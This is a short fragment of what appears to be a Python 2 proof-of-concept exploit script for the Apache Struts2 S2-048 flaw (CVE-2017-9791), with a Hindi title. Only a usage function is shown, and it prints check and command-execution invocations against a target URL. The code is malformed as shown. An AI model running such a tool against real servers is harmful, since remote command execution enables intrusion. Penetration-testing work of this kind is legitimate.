
# CVE-2017-9791 (Apache Struts2 S2-048) के लिए Python-आधारित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें पैठ परीक्षण के लिए जाँच और कमांड निष्पादन मोड शामिल हैं।
CVE-2017-9791
लेखक: DragonEgg
def Usage():
print 'check:'
print ' python file.py http://1.1.1.1/struts2-showcase/integration/saveGangster.action'
print 'poc:'
print ' python file.py http://1.1.1.1/struts2-showcase/integration/saveGangster.action command'
